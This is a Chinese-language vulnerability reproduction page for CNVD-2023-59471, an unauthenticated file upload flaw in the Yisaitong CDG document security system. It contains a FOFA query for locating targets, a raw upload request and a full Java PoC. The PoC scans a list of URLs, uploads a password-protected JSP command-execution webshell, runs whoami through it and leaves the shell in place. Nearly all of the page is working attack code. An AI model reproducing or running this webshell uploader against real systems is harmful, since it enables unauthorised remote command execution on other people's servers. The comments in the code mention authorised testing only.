影响版本
<= V5.x
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.8（注：上面的向量 S:C 配合 C:H/I:H/A:H 计算结果为 10.0；9.8 对应的是 S:U，两个字段不一致，需核对后统一）
网络空间测绘
fofa:app="亿赛通-电子文档安全管理系统"
复现
POST /CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
test
访问 http://ip:port/tttT.jsp，页面原样返回请求体中的 test 即说明无需认证即可上传（落地文件名 tttT.jsp 并不是由请求指定的）。注意：仅限授权测试；下文 PoC 脚本随后会上传带弱口令 pwd=023 的命令执行 JSP 且不做清理，测试结束后需手动删除 /tttT.jsp。
poc脚本
package org.example.POC;
import com.github.kevinsawicki.http.HttpRequest;
import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Paths;
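/**
 * CNVD-2023-59471 checker for 亿赛通 CDG (电子文档安全管理系统), affected versions {@code <= V5.x}.
 *
 * <p>For every base URL in the target list the tool (1) POSTs a harmless text body to the upload
 * endpoint, (2) confirms the same bytes are served back from {@code /tttT.jsp}, and only then
 * (3) uploads a JSP command shell and (4) requests it once with {@code whoami}.
 *
 * <p>Operational caveats for anyone running this:
 * <ul>
 *   <li>Steps 3-4 leave a persistent command shell on the target that anyone on the network can
 *       reach, guarded only by the hard-coded query-string password {@code 023}. There is no
 *       cleanup step: remove {@code /tttT.jsp} after an authorised test.</li>
 *   <li>Unless the base URL is https, the password and every executed command travel in the clear
 *       and land in server/proxy logs.</li>
 *   <li>A 200 on the final request is not proof of execution on its own; the JSP only emits
 *       {@code <pre>} when the password matched, so the body is checked as well.</li>
 * </ul>
 */
public class CNVD_2023_59471 {

    /** Target list used when no path is given on the command line (one base URL per line). */
    private static final String DEFAULT_URL_FILE = "D:\\TempData\\url.txt";

    /** Upload endpoint; the opaque query string is reproduced verbatim from the PoC request. */
    private static final String UPLOAD_PATH =
            "/CDGServer3/UploadFileFromClientServiceForClient?AFMALANMJCEOENIBDJMKFHBANGEPKHNOFJBMIFJPFNKFOKHJNMLCOIDDJGNEIPOLOKGAFAFJHDEJPHEPLFJHDGPBNELNFIICGFNGEOEFBKCDDCGJEPIKFHJFAOOHJEPNNCLFHDAFDNCGBAEELJFFHABJPDPIEEMIBOECDMDLEPBJGBGCGLEMBDFAGOGM";

    /** Path the uploaded body is served back from. The request itself does not choose this name. */
    private static final String SHELL_PATH = "/tttT.jsp";

    /** Harmless probe body: a plain-text file is written, nothing executable. */
    private static final String PROBE_BODY = "test";

    /** Password the dropped JSP compares against the {@code pwd} query parameter. */
    private static final String SHELL_PASSWORD = "023";

    /** Query string that makes the dropped JSP run {@code whoami}. */
    private static final String SHELL_CHECK_QUERY = "?pwd=" + SHELL_PASSWORD + "&i=whoami";

    /**
     * JSP command shell uploaded in step 3, kept byte-identical to the original PoC.
     *
     * <p>NOTE(review): the shell writes {@code new String(b)} for the whole 2048-byte buffer on every
     * read, so command output may be followed by stale bytes from earlier iterations; a correct
     * version would use {@code new String(b, 0, a)}. Left untouched here so the page stays a
     * faithful record of the PoC.
     */
    private static final String SHELL_BODY =
            "<% if(\"023\".equals(request.getParameter(\"pwd\"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(\"<pre>\"); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print(\"</pre>\"); } %>";

    /** Connect timeout (ms) for the three short requests; same value the original PoC used. */
    private static final int CONNECT_TIMEOUT_MS = 3000;

    /** Connect timeout (ms) for fetching the probe back; same value the original PoC used. */
    private static final int PROBE_FETCH_TIMEOUT_MS = 6000;

    /** Read timeout (ms) so a target that accepts the connection but never answers cannot hang a scan. */
    private static final int READ_TIMEOUT_MS = 10000;

    /**
     * Entry point. Reads base URLs (one per line, UTF-8) from {@code args[0]} or, when no argument is
     * given, from {@link #DEFAULT_URL_FILE}, and runs {@link #checkVuln(String)} on each.
     *
     * <p>Blank lines and lines starting with {@code #} are skipped: a blank line would otherwise be
     * turned into the relative URL {@code /CDGServer3/...} and fail with a confusing error. A failure
     * on one target is reported and the scan continues with the next.
     *
     * @param args optional path of the target list
     */
    public static void main(String[] args) {
        String urlFile = args.length > 0 ? args[0] : DEFAULT_URL_FILE;
        try (BufferedReader reader = Files.newBufferedReader(Paths.get(urlFile), StandardCharsets.UTF_8)) {
            String line;
            while ((line = reader.readLine()) != null) {
                String target = line.trim();
                if (target.isEmpty() || target.startsWith("#")) {
                    continue;
                }
                try {
                    checkVuln(target);
                } catch (RuntimeException e) {
                    // One malformed or misbehaving target must not abort the rest of the list.
                    System.out.println("[-]" + target + " 检测时出错: " + e);
                }
            }
        } catch (IOException e) {
            System.out.println("[-]无法读取目标列表 " + urlFile + ": " + e);
        }
    }

    /**
     * Checks one target and, if the unauthenticated upload is confirmed, drops and verifies the shell.
     *
     * <p>Order matters: the executable payload is only sent after the harmless probe has been
     * observed being served back, so a host that merely answers 200 to the POST is never touched
     * further. Progress and failures are printed to stdout in the same wording as the original PoC.
     *
     * @param URL base URL of the target, e.g. {@code http://host:port}; trailing slashes are dropped
     *     so the endpoint paths do not become {@code //CDGServer3/...}
     */
    public static void checkVuln(String URL) {
        String base = URL == null ? "" : URL.trim();
        while (base.endsWith("/")) {
            base = base.substring(0, base.length() - 1);
        }
        if (base.isEmpty()) {
            System.out.println("[-]目标地址为空,已跳过");
            return;
        }
        String attackUrl = base + UPLOAD_PATH;
        String webShellAddr = base + SHELL_PATH;
        try {
            // Step 1: upload a harmless text body.
            int probeCode = HttpRequest.post(attackUrl)
                    .connectTimeout(CONNECT_TIMEOUT_MS)
                    .readTimeout(READ_TIMEOUT_MS)
                    .send(PROBE_BODY)
                    .code();
            if (probeCode != 200) {
                System.out.println("[-]目标网站可能不存在漏洞!!!");
                return;
            }

            // Step 2: the server must serve back exactly the bytes that were uploaded.
            String served = HttpRequest.get(webShellAddr)
                    .connectTimeout(PROBE_FETCH_TIMEOUT_MS)
                    .readTimeout(READ_TIMEOUT_MS)
                    .body();
            if (!PROBE_BODY.equals(served)) {
                System.out.println("[-]Webshell上传失败,请尝试其他JSP木马尝试!!!");
                return;
            }
            System.out.println("[+]目标网站可能存在漏洞!!!");
            System.out.println("[+]正在进行getShell,请等待!!!");

            // Step 3: upload the JSP shell (persistent on the target; see class doc).
            int shellCode = HttpRequest.post(attackUrl)
                    .connectTimeout(CONNECT_TIMEOUT_MS)
                    .readTimeout(READ_TIMEOUT_MS)
                    .send(SHELL_BODY)
                    .code();
            if (shellCode != 200) {
                System.out.println("[-]Webshell上传失败!请更换重新更换尝试上传.....");
                return;
            }

            // Step 4: run whoami through the shell. The JSP prints "<pre>" only when the password
            // matched, so require that marker in addition to the 200 the original PoC checked.
            HttpRequest check = HttpRequest.get(webShellAddr + SHELL_CHECK_QUERY)
                    .connectTimeout(CONNECT_TIMEOUT_MS)
                    .readTimeout(READ_TIMEOUT_MS);
            int commandCode = check.code();
            String commandBody = check.body();
            if (commandCode == 200 && commandBody != null && commandBody.contains("<pre>")) {
                System.out.println("[+]Webshell上传成功,地址是" + webShellAddr + SHELL_CHECK_QUERY);
            } else {
                System.out.println("[-]Webshell上传失败!!!可能存在AV被杀掉QWQ");
            }
        } catch (HttpRequest.HttpRequestException e) {
            System.out.println("[-]存在网络连接问题-_-!");
        }
    }
}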